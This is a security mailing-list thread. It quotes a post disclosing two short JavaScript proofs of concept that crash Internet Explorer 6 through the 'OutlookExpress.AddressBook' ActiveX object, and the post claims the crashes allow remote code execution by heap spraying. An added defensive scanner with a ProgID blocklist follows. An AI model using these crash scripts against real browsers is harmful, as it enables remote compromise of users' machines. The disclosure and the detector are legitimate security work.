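Fortunately, the major distributors of pirated Windows builds in China have all stripped out OE and the like. Vista and later don't ship OE anymore either...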
On Jul 15, 10:17 am, 大风 <[EMAIL PROTECTED]> wrote:
> It's been a while, and I got a bit rusty on the 'ol browser hacks here and
> there, mainly because of lack of time. That doesn't mean I didn't research some
> browser issues behind the screen. One of them is the XBM image processing in
> Firefox, and found that I cannot exploit it[1]. Which is good for Firefox
> users! Opera tends toward denial-of-service behavior on the XBM #define w/h header,
> which might be worthy to investigate some day. Nevertheless, I reverted a
> system to run solely Internet Explorer 6 to test some ideas a moment ago.
> Therefore, I am not sure if these exploits run on MSIE 7 or later. In any
> case, they crash MSIE 6 in such a way that remote code execution becomes
> possible by controlling the heap with JavaScript aka heapspraying. Since
> there are a lot of heapspraying code blocks available on many hacking
> repositories I will not go into that, most of them are generic and can be
> re-used with a few tweaks, think Milw0rm, or HDM's website.
>
> OK, we are only crashing Internet Explorer 6 with the dreaded Active-X
> objects from Microsoft just to toy with the idea. There have been many
> variations regarding the exploitation of Active-X, and this is simply
> another way of abusing them with the most minimal code. I simply wanted to
> obtain a method of crashing Internet Explorer with little means, and this is
> what the below examples do. And remember not all crashes are exploitable,
> but these generally are if you know what you are doing.
>
> Anyway, have fun as long as it lasts!
>
> Some compact examples, probably more variations possible:
>
> <script>
> for(i=0;i<33;i++){
>   try{
>     foo = new ActiveXObject("OutlookExpress.AddressBook").concat('3'+'3'+'3');
>   }catch(e){}
> }
> </script>
>
> <script>
> for(i=0;i<33;i++){
>   try{
>     foo = new ActiveXObject("OutlookExpress.AddressBook").join(1,1,1);
>   }catch(e){}
> }
> </script>
>
> And do whatever thou wishest!
>
> [1]http://mxr.mozilla.org/firefox/source/modules/libpr0n/decoders/xbm/ns...
> der.cpp#254
>
> [Ph4nt0m] <http://www.ph4nt0m.org/>
>
> [Ph4nt0m Security Team]
>
> <http://blog.ph4nt0m.org/> [EMAIL PROTECTED]
>
> Email: [EMAIL PROTECTED]
>
> PingMe:
> <http://cn.pingme.messenger.yahoo.com/webchat/ajax_webchat.php?yid=han...
> hq&sig=9ae1bbb1ae99009d8859e88e899ab2d1c2a17724>
>
> === V3ry G00d, V3ry Str0ng ===
>
> === Ultim4te H4cking ===
>
> === XPLOITZ ! ===
>
> === #_# ===
>
> #If you brave,there is nothing you cannot achieve.#
>
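A defender-side check for the pattern in the quoted post, as an added example that is not part of the original messages: it scans page source for script-side `new ActiveXObject(...)` calls, folds string literals joined with `+` into one ProgID, and flags any that are on a blocklist. The function names, the blocklist variable and the sample page are assumptions constructed for illustration; the only blocked ProgID is the one named in the post.

```javascript
// Added example: flag script-side instantiation of ActiveX ProgIDs that
// web content should not be creating. Names here are hypothetical.
// BLOCKED_PROGIDS holds only the ProgID named in the post; extend per policy.
const BLOCKED_PROGIDS = new Set(["outlookexpress.addressbook"]);

// Matches: new ActiveXObject( <string literals joined by +> )
// Whitespace or newlines between `new` and `ActiveXObject` are tolerated.
const CALL_RE = /new\s+ActiveXObject\s*\(\s*((?:"[^"]*"|'[^']*')(?:\s*\+\s*(?:"[^"]*"|'[^']*'))*)\s*[,)]/g;
const LITERAL_RE = /"([^"]*)"|'([^']*)'/g;

// Fold "a" + 'b' into "ab" so a ProgID split across literals still matches.
function foldLiterals(expr) {
  let out = "";
  for (const m of expr.matchAll(LITERAL_RE)) out += m[1] ?? m[2] ?? "";
  return out;
}

// Returns [{ progId, line, blocked }] for every instantiation found in `html`.
// ProgIDs are compared case-insensitively, as the registry treats them.
function findActiveXUse(html) {
  const findings = [];
  for (const m of html.matchAll(CALL_RE)) {
    const progId = foldLiterals(m[1]);
    const line = html.slice(0, m.index).split("\n").length;
    findings.push({ progId, line, blocked: BLOCKED_PROGIDS.has(progId.toLowerCase()) });
  }
  return findings;
}

// Constructed sample page (not from the post): one blocked ProgID written as
// split literals across two lines, and one ProgID that is not on the blocklist.
const SAMPLE = [
  "<script>",
  "var a = new",
  "  ActiveXObject('Outlook' + \"Express.AddressBook\");",
  "var x = new ActiveXObject('Microsoft.XMLHTTP');",
  "</script>",
].join("\n");

for (const f of findActiveXUse(SAMPLE)) {
  console.log(`${f.blocked ? "BLOCK" : "allow"} line ${f.line}: ${f.progId}`);
}
```

Calls whose argument is a variable rather than string literals are not matched by this check, so it complements rather than replaces removing or disabling the control on the host.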